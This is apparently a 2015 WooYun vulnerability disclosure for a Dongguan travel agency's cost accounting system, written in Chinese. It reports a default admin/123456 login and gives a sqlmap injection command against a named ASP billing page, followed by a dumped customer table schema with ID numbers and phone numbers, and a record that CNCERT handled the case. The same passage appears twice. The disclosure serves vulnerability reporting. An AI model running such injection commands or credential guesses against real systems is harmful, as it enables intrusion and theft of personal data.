当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150169

漏洞标题:东青旅某系统弱口令/SQL注射泄露110W旅游客户(姓名/身份证/号码/行程)

相关厂商:东莞市青年国际旅行社有限公司

漏洞作者: 路人甲

提交时间:2015-10-28 23:36

修复时间:2015-12-14 17:12

公开时间:2015-12-14 17:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-28: 细节已通知厂商并且等待厂商处理中
2015-10-30: 厂商已经确认,细节仅向厂商公开
2015-11-09: 细节向核心白帽子及相关领域专家公开
2015-11-19: 细节向普通白帽子公开
2015-11-29: 细节向实习白帽子公开
2015-12-14: 细节向公众公开

简要描述:

一个弱口令,一个注入打包奉上。

详细说明:

东青旅成本核算系统

**.**.**.**/


用户名admin密码123456


B1.png


b2.png


B3.png


sql注射

sqlmap.py -u "**.**.**.**:89/modules/finace/viewbill.asp?billid=200" --dbs


B4.png


B5.png


B6.png


Database: ANYTRAVEL
Table: SALE_CONSUMER
[29 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| ASSIGN | VARCHAR2 |
| BENEFIT | VARCHAR2 |
| BIRTHDAY | VARCHAR2 |
| CERTIFICATE_ID | VARCHAR2 |
| CERTIFICATE_TYPE_ID | NUMBER |
| CREATE_DATE | DATE |
| CUSTOMER_ID | NUMBER |
| CUSTOMER_TYPE | NUMBER |
| FLAGINS | NUMBER |
| GROUP_ID | NUMBER |
| INS_QTY | VARCHAR2 |
| MAIL | VARCHAR2 |
| NAME | VARCHAR2 |
| OWNER_ENTITY_ID | NUMBER |
| OWNER_ID | NUMBER |
| PHBIRTHDAY | VARCHAR2 |
| PHIDNO | VARCHAR2 |
| PHIDNOTYPE | NUMBER |
| PHNAME | VARCHAR2 |
| PHONE | VARCHAR2 |
| PHSEX | VARCHAR2 |
| PRODUCT_ID | NUMBER |
| PRODUCT_TABLE | VARCHAR2 |
| REMARK | VARCHAR2 |
| SEX | VARCHAR2 |
| STAFF_ID | NUMBER |
| SUBORDER_ID | NUMBER |
| SUBORDER_TABLE | VARCHAR2 |
| UPDATE_DATE | DATE |
+---------------------+----------+


b7.png


B8.png

漏洞证明:

东青旅成本核算系统

**.**.**.**/


用户名admin密码123456


B1.png


b2.png


B3.png


sql注射

sqlmap.py -u "**.**.**.**:89/modules/finace/viewbill.asp?billid=200" --dbs


B4.png


B5.png


B6.png


Database: ANYTRAVEL
Table: SALE_CONSUMER
[29 columns]
+---------------------+----------+
| Column | Type |
+---------------------+----------+
| ASSIGN | VARCHAR2 |
| BENEFIT | VARCHAR2 |
| BIRTHDAY | VARCHAR2 |
| CERTIFICATE_ID | VARCHAR2 |
| CERTIFICATE_TYPE_ID | NUMBER |
| CREATE_DATE | DATE |
| CUSTOMER_ID | NUMBER |
| CUSTOMER_TYPE | NUMBER |
| FLAGINS | NUMBER |
| GROUP_ID | NUMBER |
| INS_QTY | VARCHAR2 |
| MAIL | VARCHAR2 |
| NAME | VARCHAR2 |
| OWNER_ENTITY_ID | NUMBER |
| OWNER_ID | NUMBER |
| PHBIRTHDAY | VARCHAR2 |
| PHIDNO | VARCHAR2 |
| PHIDNOTYPE | NUMBER |
| PHNAME | VARCHAR2 |
| PHONE | VARCHAR2 |
| PHSEX | VARCHAR2 |
| PRODUCT_ID | NUMBER |
| PRODUCT_TABLE | VARCHAR2 |
| REMARK | VARCHAR2 |
| SEX | VARCHAR2 |
| STAFF_ID | NUMBER |
| SUBORDER_ID | NUMBER |
| SUBORDER_TABLE | VARCHAR2 |
| UPDATE_DATE | DATE |
+---------------------+----------+


b7.png


B8.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-30 17:10

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给广东分中心,由广东分中心后续协调网站管理单位处置。

最新状态:

暂无